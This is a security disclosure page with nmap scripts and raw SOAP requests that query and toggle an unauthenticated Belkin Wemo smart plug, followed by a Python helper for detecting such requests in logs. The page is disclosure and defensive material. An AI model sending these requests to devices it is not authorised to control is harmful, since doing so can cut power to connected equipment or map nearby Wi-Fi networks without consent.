Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version WeMo_WW_2.00.10966.PVT-OWRT-SNS does not require authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published for this purpose.
wemo-info.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-info.nse
wemo-info.nse obtains information from a Wemo Switch from an XML file and a service, both located on the web interface on a port in the range 49152 to 49154. The XML file is located at the URL /setup.xml. This file contains information about the device such as name, model, version, serial, firmware version and current switch state. Information about nearby wireless networks is gathered by issuing a SOAP request to /upnp/control/WiFiSetup1 using the method GetApList.
To gather information from a Belkin Wemo Switch use the following command:
# nmap --script wemo-info.nse -p49152-49254 <target>

Request:
POST /upnp/control/WiFiSetup1 HTTP/1.0
Host: 192.168.1.80
Content-Type: text/xml
Content-Length: 239
SOAPACTION: "urn:Belkin:service:WiFiSetup1:1#GetApList"

<?xml ?>
<s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:GetApList xmlns:u="urn:Belkin:service:WiFiSetup1:1">
    </u:GetApList>
  </s:Body>
</s:Envelope>
Response:
HTTP/1.0 200 OK
CONTENT-LENGTH: 493
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Thu, 22 Jun 2017 17:01:01 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic

<s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:GetApListResponse xmlns:u="urn:Belkin:service:WiFiSetup:1">
      <ApList>Page:1/1/6$ INFINITUM|1|24|WPA1PSKWPA2PSK/TKIPAES, INFINITUMu|5|0|WPA1PSKWPA2PSK/TKIPAES, INFINITUM|6|0|WPA2PSK/AES, INFINITUM|6|20|WEP, INFINITUM|8|29|WPA2PSK/AES, INFINITUM|10|10|WPA1PSKWPA2PSK/TKIPAES, </ApList>
    </u:GetApListResponse>
  </s:Body>
</s:Envelope>
wemo-switch.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-switch.nse
wemo-switch.nse is a script that changes the switch state (ON/OFF). It issues a SOAP request to /upnp/control/basicevent1 using the method SetBinaryState. The BinaryState element of that request is filled with the value passed in the NMap script argument BinaryState.
In order to turn the device connected to the Wemo Switch OFF you would need to issue the following command:
# nmap --script wemo-switch.nse --script-args BinaryState=0 -p49152-49254 <target>

Request:
POST /upnp/control/basicevent1 HTTP/1.0
Content-Type: text/xml; charset="utf-8"
HOST: 192.168.1.80
Content-Length: 316
SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState"
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent1:1">
      <BinaryState>1</BinaryState>
    </u:SetBinaryState>
  </s:Body>
</s:Envelope>
Response:
HTTP/1.0 200 OK
CONTENT-LENGTH: 376
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Thu, 22 Jun 2017 17:52:02 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic

<s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:SetBinaryStateResponse xmlns:u="urn:Belkin:service:basicevent:1">
      <BinaryState>1</BinaryState>
      <CountdownEndTime>0</CountdownEndTime>
      <deviceCurrentTime>1498153922</deviceCurrentTime>
    </u:SetBinaryStateResponse>
  </s:Body>
</s:Envelope>
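Added example, not part of the published NSE scripts: a small Python helper that parses the ApList text returned by GetApList into structured records and flags captured HTTP requests that carry one of the two unauthenticated SOAP actions described above (GetApList and SetBinaryState), so a LAN proxy or IDS log can be checked for unexpected control traffic. The sample ApList and request are constructed from the captures on this page; the "NONE" security label for open networks is an assumption.

```python
import re
from typing import Optional

# SOAPACTION values the page shows the firmware accepting without authentication.
UNAUTH_ACTIONS = {
    "urn:Belkin:service:WiFiSetup1:1#GetApList": "discloses nearby Wi-Fi networks",
    "urn:Belkin:service:basicevent:1#SetBinaryState": "changes the outlet power state",
}

# Constructed sample: the <ApList> text from the GetApList response shown above.
SAMPLE_APLIST = ("Page:1/1/6$ INFINITUM|1|24|WPA1PSKWPA2PSK/TKIPAES, "
                 "INFINITUMu|5|0|WPA1PSKWPA2PSK/TKIPAES, INFINITUM|6|0|WPA2PSK/AES, "
                 "INFINITUM|6|20|WEP, INFINITUM|8|29|WPA2PSK/AES, "
                 "INFINITUM|10|10|WPA1PSKWPA2PSK/TKIPAES, ")

# Constructed sample: header block of a SetBinaryState request as a proxy would log it.
SAMPLE_REQUEST = ("POST /upnp/control/basicevent1 HTTP/1.0\r\n"
                  "HOST: 192.168.1.80\r\n"
                  'SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState"\r\n'
                  'Content-Type: text/xml; charset="utf-8"\r\n\r\n')

def parse_ap_list(ap_list: str) -> list:
    """Parse 'Page:cur/total/count$ SSID|channel|signal|security, ...' into dicts.
    The 'Page:...$' prefix is dropped and the empty trailing entry is skipped."""
    body = ap_list.split("$", 1)[1] if "$" in ap_list else ap_list
    aps = []
    for entry in body.split(","):
        fields = [f.strip() for f in entry.split("|")]
        if len(fields) != 4:
            continue
        ssid, channel, signal, security = fields
        aps.append({"ssid": ssid, "channel": int(channel),
                    "signal": int(signal), "security": security})
    return aps

def weak_networks(aps: list) -> list:
    """SSIDs advertising WEP (seen on the page) or no security ('NONE' is an assumed label)."""
    return [ap["ssid"] for ap in aps if ap["security"] in ("WEP", "NONE")]

def flag_unauth_control(raw_request: str) -> Optional[str]:
    """Return an alert line if the captured request uses one of the unauthenticated
    Wemo control actions, else None. Intended for proxy or IDS HTTP captures."""
    m = re.search(r'^SOAPACTION:\s*"([^"]+)"', raw_request, re.I | re.M)
    if not m or m.group(1) not in UNAUTH_ACTIONS:
        return None
    host = re.search(r"^HOST:\s*(\S+)", raw_request, re.I | re.M)
    target = host.group(1) if host else "unknown-host"
    return f"Wemo {m.group(1)} sent to {target}: {UNAUTH_ACTIONS[m.group(1)]}"
```

Running flag_unauth_control over each request in a capture gives one alert per control call, with the target switch taken from the HOST header.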